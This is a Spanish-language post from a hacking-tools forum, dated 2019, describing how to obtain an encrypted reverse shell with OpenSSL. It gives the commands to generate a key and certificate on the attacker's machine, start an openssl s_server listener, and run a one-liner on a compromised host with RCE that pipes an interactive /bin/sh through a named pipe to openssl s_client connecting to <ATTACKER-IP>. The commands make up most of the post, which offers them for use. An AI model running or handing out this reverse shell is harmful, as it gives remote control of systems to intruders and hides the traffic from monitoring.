Reverse shell con OpenSSL

Foro para publicar nuevas herramientas o artículos sobre herramientas de hacking.
Avatar de Usuario
jesseshl
Mensajes: 14
Registrado: Dom Nov 18, 2018 1:10 am

Reverse shell con OpenSSL

Mensaje por jesseshl » Jue Feb 21, 2019 3:55 pm

Se pueden conseguir shell con netcat, php, perl, .net, lolbins, etc. etc, pero con OpenSSL? Me refiero al openssl que usamos para secuestrar el archivo ocultos, sí el openssl que usa casi todos los https que necesitan lib en su sistema, sí y finalmente la gente de openssl usa para generar sus claves, etc., sí, el mismo openssl y puede usarlo para obtener una shell inversa.

Se necesita tener privilegio root

Para iniciar el servidor, necesitamos generar claves en el cuadro del atacante

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Iniciamos en nuestra maquina

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

En la máquina comprometida en la que tiene RCE, ejecute esto ...

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

Volver a “Herramientas de hacking”